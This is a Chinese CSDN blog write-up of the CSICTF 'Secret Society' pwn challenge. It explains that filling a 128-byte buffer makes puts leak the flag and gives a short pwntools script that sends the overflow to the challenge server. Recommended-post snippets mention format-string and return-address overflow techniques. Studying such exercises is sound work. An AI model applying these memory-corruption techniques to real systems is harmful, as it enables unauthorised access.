【CSICTF】Secret Society WriteUp

最新推荐文章于 2021-02-06 16:45:20 发布
最新推荐文章于 2021-02-06 16:45:20 发布
阅读量290 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107460378
版权


这道题解题人数明显比前面三道题少了很多,不知道为啥 =_=
我感觉还是比较简单的

根本不需要读懂它到底在搞什么,只需要知道,我们让puts v5的时候连带着把s也输出出来就好了
其实这里的处理就是从换行符截断,然后在后面加上“,we are everywhere.”,因此,把v5的128字节写满即可。后面读flag的时候会覆盖掉,可以成功输出

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('chall.csivit.com',30041)
#io=process('./secret-society')
elf=ELF('./secret-society')

ra()
sl('a'*128)

io.interactive()

古月浪子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
古典加密writeup
01-05
CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
CSICTF2020随缘Writeup
sash1mi
02-06 3208
CSICTF2020随缘Writeup 国外的一个CTF比赛,题目难度适中,这里附上源码及下载地址 https://github.com/k3vin-3/CSICTF2020 Web Cascade 考点:CSS文件 按F12直接在Network中查看CSS文件,拿到flag csictf{w3lc0me_t0_csictf} CCC 考点:jwt、文件包含 在右侧菜单栏中Our Admins和Login不能直接点开,但是通过源代码可以看到链接了两个地址:/adminNames和/login,访问/a
某RSA
YUK_103的博客
03-02 866
题目如下所示: from Crypto.Util.number import getPrime,bytes_to_long from sympy import Derivative from fractions import Fraction from secret import flag p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q z=Fra...
CSICTF】Global Warming WriteUp
古月浪子的博客
07-23 203
一道格式化字符串漏洞的题,以前遇到这种题都是手撸payload,今天来试试pwntools自带的工具 由于读取字符数有限制,不能栈溢出,但是发现程序直接将读取的字符串printf,导致可以利用格式化字符串漏洞 %n可以将已输出的字符数当作4字节整数写入指向的内存地址,同理%hhn可以写入单字节整数 利用这一点去改写admin的值,即可绕过检测 如果是有回显的题目,通常用aaaa%p-%p-%p-%p-%p…来找偏移,看到0x61616161即可确定偏移量 用%xc来输出x个字符,这样便可控制写入的值.
CSICTF】Esrever WriteUp
古月浪子的博客
07-23 530
这道题看起来不像是逆向,更像是密码学 =_= import random # TODO: Remember to remove real flag before deploying flag = 'csictf{fake_flag}' key = 'fake_key' def enc1(text): r = random.randint(1,25) return bytes.fromhex(''.join([hex(((ord(i) - ord('a') - r) % 26) + o.
CSICTF】RicknMorty WriteUp
古月浪子的博客
07-23 198
第一道逆向题 大致流程就是,随机给你出几道题,题目是这样的:给你2个不是太大的数,求最小公因数,然后计算最小公因数+3的阶乘 所有题目回答正确并且用时小于30秒就能获得flag 讲真的,这种程度的题目我室友应该能2秒一道口算出结果 我算不了这么快,还是老老实实上python脚本吧 这里借用一下pwn题的模板 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' contex.
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
CSICTF】pydis2ctf WriteUp
古月浪子的博客
07-23 582
这题我感觉我做的有问题,最后虽然答案是勉强凑出来了 题目给了3个附件 cipher1: 2 0 LOAD_CONST 1 ('') 2 STORE_FAST 1 (ret_text) 3 4 LOAD_GLOBAL 0 (list) 6 LOAD_FAST 0 (text) .
ISCC2019—MISC总结
yxl_d的博客
06-05 1025
ISCC2019已经结束了,虽然做不出来几道题,但是经过后来的学习觉得还是有必要总结一下的。 MISC1(隐藏的信息) 这道题主要是进制转换后再转ascll码,然后base解码 首先考虑到每个数字的大小,就发现都是八进制,然后转为十进制 然后十进制转ascll码得 看起来应该是base解码,不妨试一下 OK,flag出来了… MISC2(倒立屋) 房屋为什么会倒立!是重力反转了吗? 这道题...
攻防世界 Misc高手进阶区 5分题 Keyes_secret
闵行小鱼塘
12-31 1118
继续ctf的旅程,攻防世界Misc高手进阶区的5分题,本篇是Keyes_secret的writeup
CSICTF】pwn intended 0x1 WriteUp
古月浪子的博客
07-23 156
一道pwn的签到题 v4的长度为0x30-4,使用的是gets函数读取输入,所以可以溢出 只要满足v5不等于0就可以拿到flag,于是通过溢出修改v5的值即可 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) sl=lambda x:io.
CSICTF】pwn intended 0x2 WriteUp
古月浪子的博客
07-23 135
在上一题的基础上改进了一下,大体上没有多大区别 v5不再是要求不等于0了,而是要等于特定的值 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) sl=lambda x:io.sendline(x) ru=lambda x:io.recvu.
CSICTF】pwn intended 0x3 WriteUp
古月浪子的博客
07-23 166
和第二题不同了,这次是需要溢出覆盖ret addr 可以看到后门函数,地址是0x4011CE,并且程序没有开启PIE from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) sl=lambda x:io.sendline(x) ru=lamb.
CSICTF 部分逆向wp
苗_的博客
07-29 376
RicknMorty 整个看下来逻辑就是,随机出现两个数,找到他们的最小公因数,然后+3求阶乘。(在30s内算完所有即可) (当时没有用脚本,直接计算器走一波就出来了) 附上脚本: from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) s
BUUCTF:[MRCTF2020]ezmisc
末初的CSDN博客
11-03 2778
题目地址:https://buuoj.cn/challenges#[MRCTF2020]ezmisc 题目如下 使用010 Editor打开出现CRC校验出错 修改宽高 保存即可发现flag flag{1ts_vEryyyyyy_ez!}
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值